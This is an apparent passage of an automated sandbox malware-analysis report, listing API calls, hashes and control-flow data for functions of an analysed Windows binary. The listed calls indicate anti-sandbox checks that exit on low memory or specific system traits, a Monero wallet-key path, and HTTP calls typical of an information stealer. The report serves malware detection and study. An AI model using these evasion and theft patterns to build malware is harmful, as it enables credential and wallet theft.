                                • Associated: 00000000.00000002.1795561532.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001265000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001274000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795862466.0000000001275000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795970084.000000000140C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795984485.000000000140D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                                • String ID: :$C$\
                                • API String ID: 1544550907-3809124531
                                • Opcode ID: 32470906ce11c8756595f080898b915ba4c0de22e5070e78fced7be8999d05d6
                                • Instruction ID: 5b74f69862cbb92f0304321fda038763b946479eea8d524c86c9f8a7cc5699ca
                                • Opcode Fuzzy Hash: 32470906ce11c8756595f080898b915ba4c0de22e5070e78fced7be8999d05d6
                                • Instruction Fuzzy Hash: A7416DB1D04248ABDF10DF94DD45BEEBBB8EF08704F140199F509A7280DB74AA44CBB5
                                Function 00D969F0 Relevance: 9.1, APIs: 6, Instructions: 89sleepCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                APIs
                                  • Part of subcall function 00D99860: GetProcAddress.KERNEL32(74DD0000,018224A0), ref: 00D998A1
                                  • Part of subcall function 00D99860: GetProcAddress.KERNEL32(74DD0000,018224B8), ref: 00D998BA
                                  • Part of subcall function 00D99860: GetProcAddress.KERNEL32(74DD0000,018223B0), ref: 00D998D2
                                  • Part of subcall function 00D99860: GetProcAddress.KERNEL32(74DD0000,018224D0), ref: 00D998EA
                                  • Part of subcall function 00D99860: GetProcAddress.KERNEL32(74DD0000,01822350), ref: 00D99903
                                  • Part of subcall function 00D99860: GetProcAddress.KERNEL32(74DD0000,01829018), ref: 00D9991B
                                  • Part of subcall function 00D99860: GetProcAddress.KERNEL32(74DD0000,018158B0), ref: 00D99933
                                  • Part of subcall function 00D99860: GetProcAddress.KERNEL32(74DD0000,01815830), ref: 00D9994C
                                  • Part of subcall function 00D99860: GetProcAddress.KERNEL32(74DD0000,01822218), ref: 00D99964
                                  • Part of subcall function 00D99860: GetProcAddress.KERNEL32(74DD0000,01822308), ref: 00D9997C
                                  • Part of subcall function 00D99860: GetProcAddress.KERNEL32(74DD0000,01822500), ref: 00D99995
                                  • Part of subcall function 00D99860: GetProcAddress.KERNEL32(74DD0000,01822320), ref: 00D999AD
                                  • Part of subcall function 00D99860: GetProcAddress.KERNEL32(74DD0000,018158D0), ref: 00D999C5
                                  • Part of subcall function 00D99860: GetProcAddress.KERNEL32(74DD0000,01822230), ref: 00D999DE
                                  • Part of subcall function 00D9A740: lstrcpy.KERNEL32(00DA0E17,00000000), ref: 00D9A788
                                  • Part of subcall function 00D811D0: ExitProcess.KERNEL32 ref: 00D81211
                                  • Part of subcall function 00D81160: GetSystemInfo.KERNEL32(?), ref: 00D8116A
                                  • Part of subcall function 00D81160: ExitProcess.KERNEL32 ref: 00D8117E
                                  • Part of subcall function 00D81110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00D8112B
                                  • Part of subcall function 00D81110: VirtualAllocExNuma.KERNEL32(00000000), ref: 00D81132
                                  • Part of subcall function 00D81110: ExitProcess.KERNEL32 ref: 00D81143
                                  • Part of subcall function 00D81220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00D8123E
                                  • Part of subcall function 00D81220: __aulldiv.LIBCMT ref: 00D81258
                                  • Part of subcall function 00D81220: __aulldiv.LIBCMT ref: 00D81266
                                  • Part of subcall function 00D81220: ExitProcess.KERNEL32 ref: 00D81294
                                  • Part of subcall function 00D96770: GetUserDefaultLangID.KERNEL32 ref: 00D96774
                                  • Part of subcall function 00D81190: ExitProcess.KERNEL32 ref: 00D811C6
                                  • Part of subcall function 00D97850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00D811B7), ref: 00D97880
                                  • Part of subcall function 00D97850: RtlAllocateHeap.NTDLL(00000000), ref: 00D97887
                                  • Part of subcall function 00D97850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00D9789F
                                  • Part of subcall function 00D978E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00D97910
                                  • Part of subcall function 00D978E0: RtlAllocateHeap.NTDLL(00000000), ref: 00D97917
                                  • Part of subcall function 00D978E0: GetComputerNameA.KERNEL32(?,00000104), ref: 00D9792F
                                  • Part of subcall function 00D9A9B0: lstrlen.KERNEL32(?,01829188,?,\Monero\wallet.keys,00DA0E17), ref: 00D9A9C5
                                  • Part of subcall function 00D9A9B0: lstrcpy.KERNEL32(00000000), ref: 00D9AA04
                                  • Part of subcall function 00D9A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00D9AA12
                                  • Part of subcall function 00D9A8A0: lstrcpy.KERNEL32(?,00DA0E17), ref: 00D9A905
                                • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,018290F8,?,00DA110C,?,00000000,?,00DA1110,?,00000000,00DA0AEF), ref: 00D96ACA
                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00D96AE8
                                • CloseHandle.KERNEL32(00000000), ref: 00D96AF9
                                • Sleep.KERNEL32(00001770), ref: 00D96B04
                                • CloseHandle.KERNEL32(?,00000000,?,018290F8,?,00DA110C,?,00000000,?,00DA1110,?,00000000,00DA0AEF), ref: 00D96B1A
                                • ExitProcess.KERNEL32 ref: 00D96B22
                                Memory Dump Source
                                • Source File: 00000000.00000002.1795411098.0000000000D81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                • Associated: 00000000.00000002.1795391761.0000000000D80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E3D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E62000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000000FDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001161000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.000000000123B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001265000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001274000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795862466.0000000001275000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795970084.000000000140C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795984485.000000000140D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                                • String ID:
                                • API String ID: 2525456742-0
                                • Opcode ID: 9f1c3baf6864f1a4a0dee5a3c50f60f9314f5ba58814c516306fed8703fb5ac6
                                • Instruction ID: 2f64ed57a9bdda0d4c70ec56b42577c1ddd79ca92f17639d6a03f9e2fb56ce17
                                • Opcode Fuzzy Hash: 9f1c3baf6864f1a4a0dee5a3c50f60f9314f5ba58814c516306fed8703fb5ac6
                                • Instruction Fuzzy Hash: A431E472910218AADF04FBB4DC5ABEE7778EF04740F504518F202A2192EF70A905DBB6
                                Function 00D81220 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1436 d81220-d81247 call d989b0 GlobalMemoryStatusEx 1439 d81249-d81271 call d9da00 * 2 1436->1439 1440 d81273-d8127a 1436->1440 1442 d81281-d81285 1439->1442 1440->1442 1443 d8129a-d8129d 1442->1443 1444 d81287 1442->1444 1446 d81289-d81290 1444->1446 1447 d81292-d81294 ExitProcess 1444->1447 1446->1443 1446->1447
                                APIs
                                • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00D8123E
                                • __aulldiv.LIBCMT ref: 00D81258
                                • __aulldiv.LIBCMT ref: 00D81266
                                • ExitProcess.KERNEL32 ref: 00D81294
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1795411098.0000000000D81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                • Associated: 00000000.00000002.1795391761.0000000000D80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E3D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E62000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000000FDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001161000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.000000000123B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001265000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001274000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795862466.0000000001275000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795970084.000000000140C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795984485.000000000140D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                                • String ID: @
                                • API String ID: 3404098578-2766056989
                                • Opcode ID: 6ae3d48eb1fcf434db05d6d7da9627a86b639bc92fa0452ddd2d3cf518f83d6f
                                • Instruction ID: 08a34d9b1193ae54c4827074737d28b63489c76b6d6e6cb715549feb1a906689
                                • Opcode Fuzzy Hash: 6ae3d48eb1fcf434db05d6d7da9627a86b639bc92fa0452ddd2d3cf518f83d6f
                                • Instruction Fuzzy Hash: 1F01FFB4944308BADF10EBE4CD4AFADB778EB14705F248144E605B6180D6749545876D
                                Function 00D96AF3 Relevance: 6.0, APIs: 4, Instructions: 30sleepCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1450 d96af3 1451 d96b0a 1450->1451 1453 d96aba-d96ad7 call d9aad0 OpenEventA 1451->1453 1454 d96b0c-d96b22 call d96920 call d95b10 CloseHandle ExitProcess 1451->1454 1460 d96ad9-d96af1 call d9aad0 CreateEventA 1453->1460 1461 d96af5-d96b04 CloseHandle Sleep 1453->1461 1460->1454 1461->1451
                                APIs
                                • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,018290F8,?,00DA110C,?,00000000,?,00DA1110,?,00000000,00DA0AEF), ref: 00D96ACA
                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00D96AE8
                                • CloseHandle.KERNEL32(00000000), ref: 00D96AF9
                                • Sleep.KERNEL32(00001770), ref: 00D96B04
                                • CloseHandle.KERNEL32(?,00000000,?,018290F8,?,00DA110C,?,00000000,?,00DA1110,?,00000000,00DA0AEF), ref: 00D96B1A
                                • ExitProcess.KERNEL32 ref: 00D96B22
                                Memory Dump Source
                                • Source File: 00000000.00000002.1795411098.0000000000D81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                • Associated: 00000000.00000002.1795391761.0000000000D80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E3D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E62000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000000FDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001161000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.000000000123B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001265000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001274000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795862466.0000000001275000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795970084.000000000140C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795984485.000000000140D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                                • String ID:
                                • API String ID: 941982115-0
                                • Opcode ID: 9dd956263815603d71680a6aa9dbd7d65e21bf9f6879778c6566850cb971656a
                                • Instruction ID: 184bc052551d7b33d9c1f3b67206fd5eebde9f4ca76f310d1769e3e7bc853c92
                                • Opcode Fuzzy Hash: 9dd956263815603d71680a6aa9dbd7d65e21bf9f6879778c6566850cb971656a
                                • Instruction Fuzzy Hash: 93F05870A4020DABEF00ABB0DD0ABBE7B34FF04749F104614B502A21C5DBB0A540EBB6
                                Function 00D847B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63stringnetworkCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                APIs
                                • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00D84839
                                • InternetCrackUrlA.WININET(00000000,00000000), ref: 00D84849
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1795411098.0000000000D81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                • Associated: 00000000.00000002.1795391761.0000000000D80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E3D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E62000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000000FDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001161000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.000000000123B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001265000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001274000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795862466.0000000001275000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795970084.000000000140C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795984485.000000000140D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: CrackInternetlstrlen
                                • String ID: <
                                • API String ID: 1274457161-4251816714
                                • Opcode ID: 07350176952d73aa391ddae94411aa7193a20375ec5f8b1243bd7b23d0b478db
                                • Instruction ID: 3a8c8b3c3e95b85993da4786553fd121f09c1b90b3589bb72e41614093c650b6
                                • Opcode Fuzzy Hash: 07350176952d73aa391ddae94411aa7193a20375ec5f8b1243bd7b23d0b478db
                                • Instruction Fuzzy Hash: C3214FB1D00209ABDF14DFA4E845ADE7B74FF44320F108625F915A72C1EB706A09CF91
                                Function 00D951F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON
                                Download Yara Rule

                                Control-flow Graph

                                APIs
                                  • Part of subcall function 00D9A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00D9A7E6
                                  • Part of subcall function 00D86280: InternetOpenA.WININET(00DA0DFE,00000001,00000000,00000000,00000000), ref: 00D862E1
                                  • Part of subcall function 00D86280: StrCmpCA.SHLWAPI(?,0182EB68), ref: 00D86303
                                  • Part of subcall function 00D86280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00D86335
                                  • Part of subcall function 00D86280: HttpOpenRequestA.WININET(00000000,GET,?,0182E1B0,00000000,00000000,00400100,00000000), ref: 00D86385
                                  • Part of subcall function 00D86280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00D863BF
                                  • Part of subcall function 00D86280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00D863D1
                                • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00D95228
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1795411098.0000000000D81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                • Associated: 00000000.00000002.1795391761.0000000000D80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E3D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E62000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000000FDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001161000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.000000000123B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001265000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001274000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795862466.0000000001275000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795970084.000000000140C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795984485.000000000140D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                                • String ID: ERROR$ERROR
                                • API String ID: 3287882509-2579291623
                                • Opcode ID: 74891e2443416f78705b0082af7c10a79e88c7638a63d1587086d1237fb33a54
                                • Instruction ID: c1fb7c470e40482b2b5de0a04f5439d46273b1425a687d61fdd72d6e25d0d9c3
                                • Opcode Fuzzy Hash: 74891e2443416f78705b0082af7c10a79e88c7638a63d1587086d1237fb33a54
                                • Instruction Fuzzy Hash: 3D11DA31910148ABCF14FBA8DD52AED7378EF50340F404168F81A5A592EF30AB0AC7B5
                                Function 00D81110 Relevance: 4.5, APIs: 3, Instructions: 21memoryCOMMON
                                Download Yara Rule
                                APIs
                                • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00D8112B
                                • VirtualAllocExNuma.KERNEL32(00000000), ref: 00D81132
                                • ExitProcess.KERNEL32 ref: 00D81143
                                Memory Dump Source
                                • Source File: 00000000.00000002.1795411098.0000000000D81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                • Associated: 00000000.00000002.1795391761.0000000000D80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E3D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E62000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000000FDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001161000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.000000000123B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001265000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001274000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795862466.0000000001275000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795970084.000000000140C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795984485.000000000140D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Process$AllocCurrentExitNumaVirtual
                                • String ID:
                                • API String ID: 1103761159-0
                                • Opcode ID: 9d61226dfdc27b2c894e308aa947b0ce97a1a46ab89ec9eb2b57737b2aca58d8
                                • Instruction ID: 91519763bf4969cc1f0d3d354345be0e21bf1cd7e467296c14e7c9836560eacf
                                • Opcode Fuzzy Hash: 9d61226dfdc27b2c894e308aa947b0ce97a1a46ab89ec9eb2b57737b2aca58d8
                                • Instruction Fuzzy Hash: A6E0E67494530CFBE7106BA09D0FF09767CEB04B05F104054F709771D0D6B53A45A7A9
                                Function 0123236E Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 103memoryCOMMON
                                Download Yara Rule
                                APIs
                                • VirtualProtect.KERNEL32(?,?,00000040,?), ref: 01232EAA
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1795561532.0000000001161000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                • Associated: 00000000.00000002.1795391761.0000000000D80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000D81000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E3D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E62000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000000FDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.000000000123B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001265000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001274000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795862466.0000000001275000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795970084.000000000140C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795984485.000000000140D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID: V
                                • API String ID: 544645111-1342839628
                                • Opcode ID: 579f81dcd1b550f5ba05108ab649187747fda37f42e707827d6b25ebf833ed2f
                                • Instruction ID: d5fb9a2c0e7f6869814e68d2ba8893311fd4ba6196858049b6462b24404e9c07
                                • Opcode Fuzzy Hash: 579f81dcd1b550f5ba05108ab649187747fda37f42e707827d6b25ebf833ed2f
                                • Instruction Fuzzy Hash: 1031F2F263C309DFDB15AF18DC8276EBBA4FB84300F04052DDB8247650E6B66D548B9A
                                Function 00D810A0 Relevance: 2.5, APIs: 2, Instructions: 41memoryCOMMON
                                Download Yara Rule
                                APIs
                                • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 00D810B3
                                • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 00D810F7
                                Memory Dump Source
                                • Source File: 00000000.00000002.1795411098.0000000000D81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                • Associated: 00000000.00000002.1795391761.0000000000D80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E3D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E62000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000000FDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001161000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.000000000123B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001265000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001274000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795862466.0000000001275000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795970084.000000000140C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795984485.000000000140D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Virtual$AllocFree
                                • String ID:
                                • API String ID: 2087232378-0
                                • Opcode ID: 0cf4552bd03802938ba96430d32412105fc2fe2d88d44b4852ce5eaac8d0b814
                                • Instruction ID: 6c13312e656a847f4694190bab9205e43c9377f8b5983a551032706516ae1d21
                                • Opcode Fuzzy Hash: 0cf4552bd03802938ba96430d32412105fc2fe2d88d44b4852ce5eaac8d0b814
                                • Instruction Fuzzy Hash: 66F0E27164120CBBEB14ABA4AC4AFAAB7ECE705B15F301448F504E3280D572AE04DBA0
                                Function 00D81190 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00D978E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00D97910
                                  • Part of subcall function 00D978E0: RtlAllocateHeap.NTDLL(00000000), ref: 00D97917
                                  • Part of subcall function 00D978E0: GetComputerNameA.KERNEL32(?,00000104), ref: 00D9792F
                                  • Part of subcall function 00D97850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00D811B7), ref: 00D97880
                                  • Part of subcall function 00D97850: RtlAllocateHeap.NTDLL(00000000), ref: 00D97887
                                  • Part of subcall function 00D97850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00D9789F
                                • ExitProcess.KERNEL32 ref: 00D811C6
                                Memory Dump Source
